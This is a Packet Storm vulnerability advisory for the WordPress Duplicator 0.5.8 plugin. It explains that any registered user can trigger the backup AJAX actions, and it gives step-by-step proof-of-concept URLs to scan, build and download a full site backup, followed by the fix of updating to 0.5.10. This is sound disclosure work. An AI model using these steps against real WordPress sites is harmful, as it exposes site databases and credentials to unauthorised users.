WordPress Duplicator 0.5.8 Privilege Escalation

2015-02-18T00:00:00
ID PACKETSTORM:130439
Type packetstorm
Reporter Kacper Szurek
Modified 2015-02-18T00:00:00

Description

                                        
                                            `# Exploit Title: Duplicator 0.5.8 Privilege Escalation  
# Date: 21-11-2014  
# Software Link: https://wordpress.org/plugins/duplicator/  
# Exploit Author: Kacper Szurek  
# Contact: http://twitter.com/KacperSzurek  
# Website: http://security.szurek.pl/  
# Category: webapps  
  
1. Description  
  
Every registered user can create and download backup files.  
  
File: duplicator\duplicator.php  
add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan');  
add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build');  
add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete');  
add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report');  
  
http://security.szurek.pl/duplicator-058-privilege-escalation.html  
  
2. Proof of Concept  
  
Login as regular user (created using wp-login.php?action=register) then start scan:  
  
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan  
  
After that you can build backup:  
  
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build  
  
This function will return json with backup name inside File key.  
  
You can download backup using:  
  
http://wordpress-url/wp-snapshots/%file_name_from_json%  
  
3. Solution:  
  
Update to version 0.5.10  
`